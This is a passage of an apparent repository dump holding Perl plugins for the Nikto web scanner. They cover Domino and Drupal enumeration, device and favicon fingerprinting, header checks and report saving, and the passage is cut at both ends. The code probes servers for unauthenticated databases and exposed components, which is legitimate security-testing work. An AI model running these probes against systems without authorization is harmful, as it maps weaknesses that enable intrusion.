retrieval.\");\n\n    # Identify version of the Domino Server, some files have lower versions than others\n    foreach my $uri ('/download/filesets/l_LOTUS_SCRIPT.inf', '/download/filesets/n_LOTUS_SCRIPT.inf', '/download/filesets/l_SEARCH.inf', '/download/filesets/n_SEARCH.inf',\n                     '/iNotes/Forms5.nsf', '/iNotes/Forms6.nsf', '/iNotes/Forms7.nsf') {\n        ($res, $content, $error, $request, $response) = nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"Domino detection\");\n        if ($res eq \"200\" && ($content =~ /Version=([0-9.]+)/ || $content =~ /<!--\\sDomino\\sRelease\\s([0-9A-Z.]+)/)) {\n            if ($ver eq \"\") {\n                $ver = $1;\n                $finaluri = $uri;\n                $finalmark = $mark;\n                $finalreq = $request;\n                $finalres = $response;\n            }\n\n            $tmpver = $1;\n            nprint(\"+ nikto_domino.plugin: Current detected version in '$uri' : '$tmpver' , previous version: '$ver'\", \"d\");\n\n            if ($tmpver gt $ver) {\n                $ver = $tmpver;\n                $finaluri = $uri;\n                $finalmark = $mark;\n                $finalreq = $request;\n                $finalres = $response;\n            }\n        }\n    }\n\n    if ($ver ne \"\") {\n        nprint(\"+ nikto_domino.plugin: Highest detected version in '$finaluri' : '$ver'\", \"d\");\n\n        add_vulnerability(\n        $finalmark,                                              # mark structure to identify target\n        \"IBM/Lotus Domino: Version $ver detected at $finaluri.\", # message\n        520000,                                                  # tid\n        0,                                                       # Reference\n        $finaluri,                                               # URI\n        $finalreq,                                               # Request structure for full output\n        $finalres);                                              # Response structure for full output\n    }\n\n    # Now the main meat: we shall enumerated through the database and attempt to look for the\n    # .nsf files which are accessible without authentication\n    foreach my $item (@$DOMINODB) {\n        # $item will contain the entry in db_domino, made into a hash pointer\n\n        # Check if the user is terminating the current mark\n        return if $mark->{'terminate'};\n\n        # Fetch the URI, we use nfetch to ensure that auth, headers etc are taken into account\n        ($res, $content, $request, $response) = nfetch($mark, $item->{'file'}, \"GET\", \"\", \"\", \"\", \"Domino detection\");\n\n        # We're looking for a 200 response\n        if (($res eq \"200\") && !(is_404($item->{'file'}, $content, $res, $response->{'location'}))) {\n            # We could assume we've got a validate result here, but we may as well check the\n            # data if the fetched database file is password protected.\n            if ($content !~ /Please\\sidentify\\syourself/ &&\n                $content !~ /type=\"password\"/ &&\n                $content !~ /Domino\\sAdministrator\\s\\d+\\sHelp/ &&\n                $content !~ /<TITLE>Server\\sLogin<\\/TITLE>/i ) {\n                # Looks like a match - raise this up to the front end\n                add_vulnerability(\n                    $mark,                                     # mark structure to identify target\n                    \"$item->{'file'}: $item->{'description'}\", # message\n                    $item->{'nikto_id'},                       # tid\n                    523,                                       # Reference\n                    $item->{'file'},                           # URI\n                    $request,                                  # Request structure for full output\n                    $response);                                # Response structure for full output\n            }\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_drupal.plugin",
    "content": "#VERSION,1.00\n###############################################################################\n#  Copyright (C) 2006 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Perform Drupal specific tests\n###############################################################################\nsub nikto_drupal_init {\n    my $id = { name        => \"drupal\",\n               full_name   => \"Drupal Specific Tests\",\n               author      => \"Tautology\",\n               description => \"Performs a selection of drupal specific tests\",\n               hooks       => { scan => { method => \\&nikto_drupal, },\n                                start => { method => \\&nikto_drupal_load, },\n                              },\n               options     => {\n\t\t\t\t\t\t\t\tenum-modules => \"Flag to tell plugin to enumerate modules\",\n\t\t\t\t\t\t\t\tpath => \"Basic path for modules (can usually be found in page source).\",\n\t\t\t\t\t\t\t  },\n               copyright   => \"2014 Chris Sullo\"\n               };\n    use vars qw/$DRUPALMODULESDB/;\n    return $id;\n}\n\nsub nikto_drupal_load {\n    # load up the database here so we don't redo it each time\n    $DRUPALMODULESDB = init_db(\"db_drupal\");\n}\n\nsub nikto_drupal {\n\t# load mark and parameters from plugin caller\n    my ($mark, $parameters) = @_;\n\n\t# quit if user is terminating - this is a catch all and we should never execute it\n\treturn if $mark->{'terminate'};\n\n\t# Check whether we should enumerate the modules\n\treturn if !$parameters->{'enum-modules'};\n\n\t# Default module path\n\tmy $modulepath=\"/sites/default/modules\";\n\n\t# override it if it is passed as a parameter\n\tif (defined $parameters->{'path'}) {\n\t\t$modulepath=$parameters->{'path'};\n\t}\n\n\t# Now the main meat: we shall enumerated through the database and attempt to look for the\n\t# licence file in each module which is at modulepath/module/LICENSE.txt\n    foreach my $item (@$DRUPALMODULESDB) {\n\t\t# $item will contain the entry in db_drupal, made into a hash pointer\n\n\t\t# Check if the user is terminating the current mark\n        return if $mark->{'terminate'};\n\n\t\t# Set up URI\n\t\tmy $uri = \"$modulepath/$item->{'module'}/LICENSE.txt\";\n\n\t\t# Fetch the URI, we use nfetch to ensure that auth, headers etc are taken into account\n        my ($res, $content, $request, $response) = nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"drupal detection\");\n\n\t\t# We're looking for a 200 response\n        if ($res eq \"200\") {\n\t\t\t# We could assume we've got a validate result here, but we may as well check the\n\t\t\t# data for the text LICENSE [sic] to ensure that we have a real match\n\n\t\t\tif ($content =~ /LICENSE/) {\n\t\t\t\t# Looks like a match - raise this up to the front end\n\t\t\t\tadd_vulnerability(\n\t\t\t\t\t$mark, \t\t\t \t\t # mark structure to identify target\n\t\t\t\t\t\"Drupal module $item->{'module'} found\", # message\n\t\t\t\t\t$item->{'nikto_id'},\t\t\t # tid\n\t\t\t\t\t0, \t\t\t\t\t # Reference\n\t\t\t\t\t$uri,\t\t\t\t\t # URI\n\t\t\t\t\t$request,\t\t\t\t # Request structure for full output\n\t\t\t\t\t$response);\t\t\t\t # Response structure for full output\n            }\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_embedded.plugin",
    "content": "#VERSION,2.07\n###############################################################################\n#  Copyright (C) 2006 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Determine if the web site is an embedded device\n###############################################################################\nsub nikto_embedded_init {\n    my $id = { name        => \"embedded\",\n               full_name   => \"Embedded Detection\",\n               author      => \"Tautology\",\n               description => \"Checks to see whether the host is an embedded server.\",\n               hooks       => { scan => { method => \\&nikto_embedded, },\n                                start => { method => \\&nikto_embedded_load, },\n                              },\n               copyright   => \"2009 Chris Sullo\"\n               };\n    use vars qw/$EMBEDDEDDB/;\n    return $id;\n}\n\nsub nikto_embedded_load {\n    # load up the database here so we don't redo it each time\n    $EMBEDDEDDB = init_db(\"db_embedded\");\n}\n\nsub nikto_embedded {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n\n    foreach my $item (@$EMBEDDEDDB) {\n        return if $mark->{'terminate'};\n        my ($res, $content, $request, $response) = nfetch($mark, $item->{'uri'}, \"GET\", \"\", \"\", \"\", \"embedded detection\");\n        if ($res eq \"200\") {\n            $item->{'match'} = validate_and_fix_regex($item->{'match'});\n            foreach my $line (split(/\\n/, $content)) {\n\n                # Check for the matches and pull out information\n                if ($line =~ /$item->{'match'}/) {\n\n                    # Now pull out the make\n                    my $model = $line;\n                    $model =~ s/$item->{'match'}/$item->{'model'}/ee;\n                    $model =~ s/\\+/ /g;\n\n                    if ($model ne \"\") {\n                        add_vulnerability($mark, \"$item->{'message'} $model\", $item->{'nikto_id'}, 0, \"GET\", $item->{'uri'}, $request, $response);\n                    }\n                }\n            }\n        }\n    }\n\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_favicon.plugin",
    "content": "#VERSION,2.09\n###############################################################################\n#  Copyright (C) 2007 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Get a favicon file & MD5 fingerprint\n###############################################################################\nuse vars qw/$FAVICONDB %LINKICONS/;\n\nsub nikto_favicon_init {\n    my $id = { name        => \"favicon\",\n               full_name   => \"Favicon\",\n               author      => \"Sullo\",\n               description => \"Checks the web server's favicon against known favicons.\",\n               copyright   => \"2008 Chris Sullo\",\n               hooks       => {\n                          scan  => { method => \\&nikto_favicon, },\n                          start => { method => \\&nikto_favicon_load, }\n                          },\n                 };\n    return $id;\n}\n\nsub nikto_favicon_load {\n    $FAVICONDB = init_db(\"db_favicon\");\n}\n\nsub nikto_favicon {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n\n    # Check /favicon.ico\n    foreach my $ext (split(/,/,\"ico,gif,png\")) {\n\tforeach my $path (split/,/,\",/favicons\") {\n    \t\tmy ($res, $content, $error, $request, $response) = nfetch($mark, \"$path/favicon.$ext\", \"GET\", \"\", \"\", \"\", \"favicon\");\n\n    \t\tif (($res eq \"200\") && ($content ne \"\")) {\n        \t\tmy $hash = LW2::md5($content);\n        \t\t$hash =~ s/^.*://;\n        \t\tnprint(\"Got /favicon.$ext hash:$hash\", \"d\", \"\");\n        \t\tfavicon_matchhash($mark, $hash, $mark->{'root'} . \"/favicon.$ext\", $request, $response);\n    \t\t}\n\t}\n     }\n\n    # Check for a <link> favicon\n    ($res, $content, $error, $request, $response) = nfetch($mark, \"/\", \"GET\", \"\", \"\", \"\", \"favicon\");\n    if (($res eq \"200\") && ($content =~ /link\\s[^<]+icon+[^>]+\\.(ico|png|gif)/i)) {\n        my %tags;\n        $tags{'link'} = 1;\n        LW2::html_find_tags(\\$content, \\&favicon_checkhash, '', '', \\%tags);\n\tforeach my $icon (keys %LINKICONS) {\n            ($res, $content, $error, $request, $response) = nfetch($mark, $icon, \"GET\", \"\", \"\", \"\", \"favicon\");\n            if (($res eq \"200\") && ($content ne \"\")) {\n                my $hash = LW2::md5($content);\n                $hash =~ s/^.*://;\n                nprint(\"Got $icon hash:$hash\", \"d\", \"\");\n                favicon_matchhash($mark, $hash, $icon, $request, $response);\n            }\n        }\n    }\n}\n\nsub favicon_checkhash {\n    my ($tag, $elements) = @_;\n    while ((my ($e, $v)) = each(%{$elements})) {\n        if ($e ne 'href') { next; }\n        if ($v =~ /\\.(ico|png|gif)$/) {\n            my @url = LW2::uri_split($v);\n            $LINKICONS{$url[0]}=1;\n        }\n    }\n    return;\n}\n\nsub favicon_matchhash {\n    my ($mark, $hash, $icon, $request, $response) = @_;\n    return if (($hash eq \"\") || ($icon eq \"\"));\n    foreach my $item (@$FAVICONDB) {\n        if ($item->{'md5hash'} eq $hash) {\n            add_vulnerability($mark, \"$icon file identifies this app/server as: $item->{'description'}\", $item->{'nikto_id'}, 39272, \"GET\", $icon, $request, $response);\n        }\n    }\n}\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_fileops.plugin",
    "content": "#VERSION,1.00\n###############################################################################\n#  Copyright (C) 2012 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to the Free Software\n#  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Various file operations\n###############################################################################\nsub nikto_fileops_init {\n    my $id = { name        => \"fileops\",\n               full_name   => \"File Operations\",\n               author      => \"Sullo\",\n               description => \"Saves results to a text file.\",\n               copyright   => \"2012 Chris Sullo\",\n               };\n    return $id;\n}\n\n###############################################################################\n# save a result to text file\nsub save_item {\n    require JSON::PP;\n    my ($resulthash, $message, $request, $response) = @_;\n    return if $resulthash->{'mark'}->{'save_prefix'} eq '';\n    my $fn =\n        $resulthash->{'mark'}->{'save_dir'} . \"/\"\n      . $resulthash->{'mark'}->{'save_prefix'}\n      . $resulthash->{'nikto_id'} . \".txt\";\n    my $json_request    = JSON::PP->new->utf8(1)->allow_nonref(1)->encode($request);\n    my $json_response   = JSON::PP->new->utf8(1)->allow_nonref(1)->encode($response);\n    my $cookies_written = 0;\n\n    open(SAVEFILE, \">>$fn\") || die print \"ERROR opening savefile '$fn': $@\\n\";\n    print SAVEFILE \"-----------------------------------------------------------------------\\n\";\n    print SAVEFILE \"\t\t\t  Information\\n\";\n    print SAVEFILE \"-----------------------------------------------------------------------\\n\";\n    print SAVEFILE \"Test ID:  \\t\" . $resulthash->{'nikto_id'} . \"\\n\";\n    print SAVEFILE \"OSVDB ID: \\t\" . $resulthash->{'osvdb'} . \"\\n\";\n    print SAVEFILE \"Message:  \\t\" . $message . \"\\n\";\n    print SAVEFILE \"Reason:   \\t\" . $resulthash->{'reason'} . \"\\n\";\n    print SAVEFILE \"-----------------------------------------------------------------------\\n\";\n    print SAVEFILE \"\t\t\t  Request\\n\";\n    print SAVEFILE \"-----------------------------------------------------------------------\\n\";\n\n    if ($request->{'whisker'}{'method'} eq '') {\n        print SAVEFILE \"Not Applicable\\n\";\n    }\n    else {\n        print SAVEFILE $request->{'whisker'}{'method'} . \" \"\n          . $request->{'whisker'}{'uri'} . \" \"\n          . $request->{'whisker'}{'protocol'} . \"/\"\n          . $request->{'whisker'}{'version'} . \"\\n\";\n\n        foreach my $header (keys %{$request}) {\n            next if $header eq 'whisker';\n            print SAVEFILE $header . \": \" . $request->{$header} . \"\\n\";\n        }\n    }\n    print SAVEFILE \"\\n\";\n    print SAVEFILE \"-----------------------------------------------------------------------\\n\";\n    print SAVEFILE \"\t\t\t  Response\\n\";\n    print SAVEFILE \"-----------------------------------------------------------------------\\n\";\n    if ($response->{'whisker'}{'protocol'} eq '') {\n        print SAVEFILE \"Not Applicable\\n\";\n    }\n    else {\n        print SAVEFILE $response->{'whisker'}{'protocol'} . \"/\"\n          . $response->{'whisker'}{'version'} . \" \"\n          . $response->{'whisker'}{'code'} . \" \"\n          . $response->{'whisker'}{'message'} . \"\\n\";\n        foreach my $header (@{ $response->{'whisker'}{'header_order'} }) {\n\n            # Handle multiple headers with same name, e.g. set-cookie\n            if (ref($response->{$header}) eq ARRAY) {\n                if ($cookies_written && ($header eq 'set-cookie')) { next; }\n                elsif ($header eq 'set-cookie') { $cookies_written = 1; }\n                foreach my $v (@{ $response->{$header} }) {\n                    print SAVEFILE $header . \": \" . $v . \"\\n\";\n                }\n            }\n            else {\n                print SAVEFILE $header . \": \" . $response->{$header} . \"\\n\";\n            }\n        }\n        print SAVEFILE \"\\n\" . $response->{'whisker'}{'data'} . \"\\n\";\n    }\n    print SAVEFILE \"-----------------------------------------------------------------------\\n\";\n    print SAVEFILE \"\t\t\t  Data Objects\\n\";\n    print SAVEFILE \"-----------------------------------------------------------------------\\n\";\n    if ($request->{'whisker'}{'method'} ne '') {\n        print SAVEFILE \"REQUEST:$json_request\\n\";\n    }\n    if ($response->{'whisker'}{'protocol'} ne '') {\n        print SAVEFILE \"RESPONSE:$json_response\\n\";\n    }\n    close(SAVEFILE);\n}\n\n###############################################################################\n# get the prefix for all current host's save files\nsub save_getprefix {\n    my ($mark) = @_;\n    my $prefix = $mark->{'display_name'} . '_' . $mark->{'port'};\n    $prefix =~ s/,/\\-/g;\n    $prefix =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n    $prefix =~ s/_+/_/g;\n    my $now = date_disp(time());\n    $now =~ s/\\s.*$//;\n    $prefix .= \"_\" . $now . \"_\";\n    return $prefix;\n}\n\n###############################################################################\n# get mark's save file name\n# Note: this is unused right now but keeping for next release\nsub get_report_filename {\n    my ($in_file, $in_format, $mark) = @_;\n    if ($in_file eq '.') {\n        my $prefix = \"nikto_http\";\n        $prefix .= \"s\" if ($mark->{'ssl'});\n        $prefix .= \"_\" . $mark->{'display_name'} . '_' . $mark->{'port'};\n        $prefix =~ s/,/\\-/g;\n        $prefix =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        $prefix =~ s/_+/_/g;\n        my $now = date_disp(time());\n        $now =~ s/\\s.*$//;\n        $prefix .= \"_\" . $now . \".\" . $in_format;\n    }\n    else {\n        $prefix = $in_file;\n        if ($in_format eq '') {\n            $in_format = lc($in_file);\n            $in_format =~ s/(^.*\\.)([^.]*$)/$2/g;\n        }\n    }\n\n    return $prefix, $in_format;\n}\n\n###############################################################################\n# Define/create the save directory\nsub save_createdir {\n    my ($savedir, $mark) = @_;\n    if ($savedir eq '.') {\n        $savedir = 'savedir_' . $mark->{'display_name'} . '_' . $mark->{'port'};\n        $savedir =~ s/,/\\-/g;\n        $savedir =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        $savedir =~ s/_+/_/g;\n        my $now = date_disp(time());\n        $now =~ s/[^0-9-]/-/g;\n        $savedir .= \"_\" . $now;\n    }\n    elsif (-f $savedir) {\n        nprint(\"+ERROR: Directory from -Savedir is a file.\");\n        exit;\n    }\n\n    # create?\n    if (!-d $savedir) {\n        mkdir($savedir);\n        if (!-d $savedir) {\n            nprint(\"+ERROR: Unable to create -Save directory '$savedir'\");\n            exit;\n        }\n    }\n    return $savedir;\n}\n\n###############################################################################\n# Parse input host files\nsub parse_hostfile {\n    my ($file) = @_;\n    my (@results, $hostdesc);\n    my $nmap = 0;\n\n    open(IN, $file) || die print STDERR \"+ ERROR: Cannot open '$file':$@\\n\";\n    while (<IN>) {\n        my $found = 0;\n\n        # Check whether this is a greppable nmap file\n        chomp;\n        $nmap = 1 if (/^# Nmap/);\n        s/\\#.*$//;\n        if ($_ eq \"\") { next; }\n\n        # Parse for nmap files\n        if ($nmap) {\n            if (($_ !~ /Host/) || ($_ !~ /Ports/) || ($_ !~ /open/) || ($_ !~ /(?:http|ssl)/i)) {\n                next;\n            }\n\n            # parse out the line\n            my @fields = split(\"\\t\", $_);\n\n            # Get the host name\n            $fields[0] =~ /Host:\\s+([\\d\\.]+)\\s+\\(([^\\)]+)?\\)/;\n            $hostdesc = ($2 ne \"\") ? $2 : $1;\n\n            # Parse the ports list from:\n            # Host: 1.0.0.0 ()  Ports: 80/open/tcp//http///, 8000/open/tcp//http-alt///\n            $fields[1] =~ s/^Ports: //;\n            my @ports = parse_csv($fields[1]);\n            foreach my $nmp (@ports) {\n                if (($nmp !~ /(?:80|443)?\\/open\\/tcp/) || ($nmp !~ /(?:http|ssl)/i)) {\n                    nprint(\"\\tNon web port identified: $hostdesc:$nmp\", \"d\");\n                    next;\n                }\n                $nmp =~ /^(?:\\s+)?(\\d+)\\//;\n                nprint(\"+ nmap Input Queued: $hostdesc:$1\");\n                push(@results, $hostdesc . \":\" . $1);\n            }\n        }\n        else {\n            # just add it to the list\n            push(@results, $_);\n        }\n    }\n    close(IN);\n    return (@results);\n}\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_headers.plugin",
    "content": "#VERSION,2.11\n###############################################################################\n#  Copyright (C) 2007 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# General HTTP headers checks\n###############################################################################\nuse vars qw/$HEADERSDB/;\n\nsub nikto_headers_init {\n    my $id = {\n        name        => \"headers\",\n        full_name   => \"HTTP Headers\",\n        author      => \"Sullo\",\n        description => \"Performs various checks against the headers returned from an HTTP request.\",\n        hooks       => {\n                   scan      => { method => \\&nikto_headers, },\n                   postfetch => { method => \\&nikto_headers_postfetch, },\n                   start     => { method => \\&nikto_headers_load, },\n                   },\n        copyright => \"2008 Chris Sullo\"\n        };\n\n    # some global variables\n    use vars qw/%HFOUND %ETAGS %XFRAME %HEADERS_STS %BREACH %XSSPROTECTION %XCO/;\n    use vars qw/%HEADERS_XXS %HEADERS_XCTO/;\n\n    return $id;\n}\n\nsub nikto_headers_load {\n    $HEADERSDB = init_db(\"db_headers\");\n}\n\nsub nikto_headers_postfetch {\n    return if $mark->{'terminate'};\n    my ($mark, $parameters, $request, $result) = @_;\n\n    # Check for known headers\n    nikto_headers_check($mark, $result, $header, 999986, $request);\n\n    # look for internal IPs\n    foreach my $header (keys %$result) {\n\n        # skip some very unlikely headers\n        if (defined $HFOUND{$header}) { next; }\n        elsif    ($header eq 'whisker')         { next; }\n        elsif ($header eq 'date')            { next; }\n        elsif ($header eq 'content-type')    { next; }\n        elsif ($header eq 'content-length')  { next; }\n        elsif ($header eq 'connection')      { next; }\n        elsif ($header eq 'x-mod-pagespeed') { next; }\n        elsif ($header eq 'x-page-speed')    { next; }\n\n\tnext if $header eq 'server' && substr($result->{$header}, 0, 8) eq 'WebSEAL/';\n\tnext if $header eq 'x-powered-by' && $result->{$header} =~ /Oracle GlassFish Server [0-9]/;\n\n        foreach my $ip (get_ips($result->{$header})) {\n            my ($valid, $internal, $loopback) = is_ip($ip);\n            if ($valid && !$loopback) {\n                if ($ip ne $mark->{'ip'}) {\n\n                    # is it an internal, or just different?\n                    my $msg;\n                    if ($internal) { $msg .= \"RFC-1918 \"; }\n                    $msg .= \"IP address found in the '$header' header. The IP is \\\"$ip\\\".\";\n                    add_vulnerability($mark, $msg, 999979, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n                    $HFOUND{$header} = 1;\n                }\n            }\n        }\n    }\n\n    # look for inode in etag header\n    if (  !defined $ETAGS{ $mark->{hostname} }{ $mark->{port} }\n        && defined $result->{'etag'}\n        && $result->{'etag'} =~ m/-/) {\n        my $etag = $result->{'etag'};\n        $etag =~ s/\"//g;\n        my @fields = split(\"-\", $etag);\n        # Only report ETags which actually leak inodes...\n        if (scalar(@fields) == 3) {\n            my $message =\n              \"Server may leak inodes via ETags, header found with file \" . $request->{'whisker'}->{'uri'};\n            # check for numbers that are too large\n            my $ishex = 1;\n            for (my $i = 0 ; $i < 3 ; $i++) {\n                if ((length($fields[$i]) > 14) || ($fields[$i] !~ /^[0-9A-F]+$/i)) {\n                    $ishex = 0;\n                }\n            }\n            use bignum;\n            my ($inode, $size, $mtime, $ltime);\n            if ($ishex) {\n            \t$inode = \"0x$fields[0]\";\n            \t$size  = \"0x$fields[1]\";\n            \t$mtime = \"0x$fields[2]\";\n            \t$ltime = substr(sprintf(\"%s\", hex($mtime)), 0, 10);\n\t\t}\n            else {\n            \t$inode = $fields[0];\n            \t$size  = $fields[1];\n            \t$mtime = $ltime = $fields[2];\n\t\t}\n\n            $message .=\n              ($ishex == 1)\n              ? sprintf(\", inode: %d, size: %d, mtime: %s\",\n                        hex($inode), hex($size), scalar(localtime($ltime)))\n              : sprintf(\", inode: %s, size: %s, mtime: %s\", $inode, $size, $mtime);\n            add_vulnerability($mark, $message, 999984, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n            $ETAGS{ $mark->{hostname} }{ $mark->{port} } = 1;\n        }\n    }\n\n    # Look for X-Frame-Options\n    if (!$XFRAME{ $mark->{hostname} }{ $mark->{port} } && defined \t\t$result->{'whisker'}->{'code'}) {\n        if (defined $result->{'x-frame-options'}) {\n            if ($result->{'x-frame-options'} =~ /^ALLOW-FROM/) {\n                my $allowed = $result->{'x-frame-options'};\n                $allowed =~ s/^.* //g;\n                add_vulnerability( $mark,\n                    \"X-Frame-Options header is set to allow framing from $allowed. This does not have full cross-browser support (only in IE and Firefox) and may lead to the header being ignored.\",\n                    999978, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n            }\n\t\t}\n\t\telse {\n\t\t\tadd_vulnerability($mark, \"The anti-clickjacking X-Frame-Options header is not present.\",\n\t\t\t\t\t\t\t  999957, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n\t\t}\n\t\t$XFRAME{ $mark->{hostname} }{ $mark->{port} } = 1;\n    }\n\n    # Incapsula WAF\n    if (defined $result->{'x-cdn'} && ($result->{'x-cdn'} == \"Incapsula\")) {\n            add_vulnerability( $mark, \"Incapsula WAF is in use.\",\n                    999976, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n            $HFOUND{$header} = 1;\n            }\n\n    # NetIQ\n    if (defined $result->{'x-mag'}) {\n            add_vulnerability( $mark, \"NetIQ debug information is enabled. See https://www.netiq.com/documentation/netiqaccessmanager32/accessgatewayhelp/data/agsglobaladv.html.\",\n                    999946, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n            $HFOUND{$header} = 1;\n            }\n\n    # Look for any uncommon headers\n\n    foreach my $header (keys %$result) {\n        my $found = 0;\n        foreach my $st_header (@$HEADERSDB) {\n            if ($header eq $st_header->{'header'}) {\n                $found = 1;\n            }\n            elsif (defined $HFOUND{$header}{ $mark->{'hostname'} }) { $found = 1; }\n        }\n        if ($found == 0) {\n            my $x = $result->{$header};\n            $x =~ s/\\s+.*$//;\n            $mark->{'components'}->{$x} = 1;\n            $vuln=\"Uncommon header '$header' found, with contents: $result->{$header}\";\n            if (ref($x) eq 'ARRAY') {\n                $multiheader='(';\n                foreach $k (@{$x}){\n                    $multiheader .= \"$k,\";\n                }\n                $multiheader.=')';\n                $vuln = \"Uncommon header '$header' found, with multiple values: $multiheader\";\n            }\n            add_vulnerability($mark, $vuln, 999100, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n            $HFOUND{$header}{ $mark->{'hostname'} } = 1;\n        }\n    }\n\n    if ($mark->{'ssl'} && !$HEADERS_STS{ $mark->{hostname} }{ $mark->{port} } && defined $result) {\n        if (!defined $result->{'strict-transport-security'}) {\n            add_vulnerability( $mark, \"The site uses SSL and the Strict-Transport-Security HTTP header is not defined.\", 999970, 0,\n                  $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n        }\n        elsif ($result->{'strict-transport-security'} =~ /max-age=\"?0\"?/i) {\n            add_vulnerability( $mark, \"The site uses SSL and the Strict-Transport-Security HTTP header is set with max-age=0.\", 999971, 0,\n                  $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n          }\n\n       $HEADERS_STS{ $mark->{hostname} }{ $mark->{port} } = 1;\n    }\n\n    if (!$HEADERS_XCTO{ $mark->{hostname} }{ $mark->{port} } && defined $result->{'whisker'}->{'code'}) {\n        if (!defined $result->{'x-content-type-options'}) {\n            add_vulnerability( $mark,\n                \"The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.\",\n                999103, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n        }\n        $HEADERS_XCTO{ $mark->{hostname} }{ $mark->{port} } = 1;\n    }\n\n    if (!$HEADERS_XCO{ $mark->{hostname} }{ $mark->{port} } && defined $result->{'whisker'}->{'code'}) {\n        if (defined $result->{'x-clacks-overhead'}) {\n            add_vulnerability( $mark, \"There appears to be clacks overhead on the server, the message is: $result->{'x-clacks-overhead'}\", 999104, 0,\n                $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n            $HEADERS_XCO{ $mark->{hostname} }{ $mark->{port} } = 1;\n        }\n    }\n\n    # CSP report-to URI\n      if (!$HEADERS_XCO{ $mark->{hostname} }{ $mark->{port} } && defined $result->{'whisker'}->{'code'}) {\n        if (defined $result->{'report-to'}) {\n            add_vulnerability( $mark, \"A report-to header was sent by the server, the URI is: $result->{'report-to'}\", 000137, 0,\n                $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n            $HEADERS_XCO{ $mark->{hostname} }{ $mark->{port} } = 1;\n        }\n    }\n\n    return $request, $result;\n}\n\nsub nikto_headers_check {\n    return if $mark->{'terminate'};\n    my ($mark, $result, $header, $tid, $request) = @_;\n    my @interesting_headers =\n    qw /commerce-server-software daap-server dasl datacenter dav generator hosted-by hosted-with microsoftofficewebserver microsoftsharepointteamservices ms-author-via powered-by server-name serverid servlet-engine via x-aspnet-version x-blackboard-product x-cocoon-version x-compressed-by 